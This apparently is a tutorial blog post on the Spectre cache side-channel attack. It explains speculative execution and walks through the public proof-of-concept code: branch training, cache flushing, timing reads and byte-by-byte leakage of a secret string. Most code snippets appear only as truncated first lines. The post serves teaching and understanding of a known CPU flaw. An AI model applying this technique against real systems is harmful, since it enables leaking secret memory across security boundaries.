Spectre and Cache
Resources
- https://www.freebuf.com/column/161135.html
- https://bbs.pediy.com/thread-230310.htm#msg_header_h1_0
- https://github.com/Eugnis/spectre-attack
Cache
We all know that it takes much time when CPU accessing memory considering CPU caculation speed. In order to reduce the large amount of time consumption caused by CPU access, cache
arised.
This article will not introduce the exact structure of memory, if you get interested in it, please refer to this.
Let’s assume that our computer will do this operation:
1 | tmp = Array[x]; |
CPU is trying to get Array[x]
from cache first instead of memory, and here are two situations:
Array[x]
is in the cache, so CPU gets its value.Array[x]
is not in the cache, so CPU needs to access memory to get its value, which will cost more time.
Branch Prediction and Speculative Execution
Modern CPUs are multi-core and multi-threaded, that is, support parallel execution of instructions. Therefore, if there is a branch jump condition that is related to a data, but the cache does not hit the data and can only perform the memory fetch operation, the program will not serially block to wait for the end of the memory fetch to perform the branch jump, but will attempt to perform branch prediction and speculative execution. When the memory data read by the CPU comes back, the CPU then confirms according to the content of the data and the logic of the branch condition whether its speculative execution is valid, and if it is invalid, the calculation result is discarded and restored to the previous state. If effective, continue execution, which greatly improves the efficiency of the CPU.
But here is the thing: If the result of speculative execution is discarded, the code executed during speculative execution may still affect the CPU cache. When the CPU is restoring the state, the cache will not be restored, and the CPU will only restore the state of the related registers.
Let’s look at this demo:
1 | // a1_size and a2 are not in the cache |
In the demo above, CPU knows that it is a conditional judgment, and because a1_size
is not in the cache, CPU needs to access memory to get the value.
Then, CPU saves a checkpoint, and executes instructions behind speculatively, which means that CPU treats idx
as a variable that is smaller than a1_size
. If idx
is large enough, it will cause OOB reading, and a1[idx]
will be treated as an index of a2
and CPU will access memory based on a1[idx]
. Finally accessed data in a2
will be submitted from the memory to the CPU cache.
When a1_size
is read from the memory, the CPU checks the branch condition again, and it finds that it does not meet the condition and cannot continue execution. So it will discard the current calculation result, then restore to the previous state, and continue to execute the code of another branch. But the data in a2
has been submitted to the CPU cache.
The demo may be a little bit different from real PoC, but it’s easier for us to understand.
How does PoC work?
The content we want to leak is defined:
1 | char* secret = "The Magic Words are Squeamish Ossifrage."; |
malicious_x
is the shift of secret
relative to array1
:
1 | size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */ |
1 | int score[2], len = strlen(secret); |
value[0]
stores the character with the highest hit (the most likely character)value[1]
stores the character with the second highest hitscore[0]
stores the number of hits with the highest characterscore[1]
stores the number of hits for the second highest character
Guess the data byte by byte:
1 | while (--len >= 0) |
Let’s look inside readMemoryByte
to see what happens.
In this function, we will try 1000 times to guess the answer, and break if the confidence condition is met:
1 | if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) |
At the beginning, we need to flush array2
from cache:
1 | for (i = 0; i < 256; i++) |
Then there is another loop of 30 times. In this loop, it can be regarded as 5 6-cycles. The first 5 cycles are used to train the CPU, and then the conditional branch prediction is triggered for the last:
1 | /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ |
After these 30 cycles, through side-channel attacks, the access time of each item in array2
is counted, and the ASCII value of the string is deduced:
1 | /* Time reads. Order is lightly mixed up to prevent stride prediction */ |
At last, we need to find the highest and second highest results:
1 | /* Locate highest & second-highest results results tallies in j/k */ |
As for victim_function
, it’s similiar to the demo mentioned above:
1 | uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */ |
The first 5 cycles are essentially a kind of training for the CPU. Therefore, when the branch judgment of the sixth cycle causes speculative execution, the CPU is more inclined to choose the “no cross-border” branch, and therefore speculative execution. After the boundary check fails, the speculative execution result is discarded, but the value of array2[array1[x] * 512]
has been stored in the cache. When reading the content of array2[mix_t * 512]
, if you find that the reading time is abnormally fast, you can determine that mix_t
is the answer.
Postscript
CPU Spectre
is a novel cache-level attack method. However, this attack method also has its limitations, that is, the attacker needs to have a greater degree of freedom in the entire memory allocation and process control, and it is difficult to find such an exploit at the application level.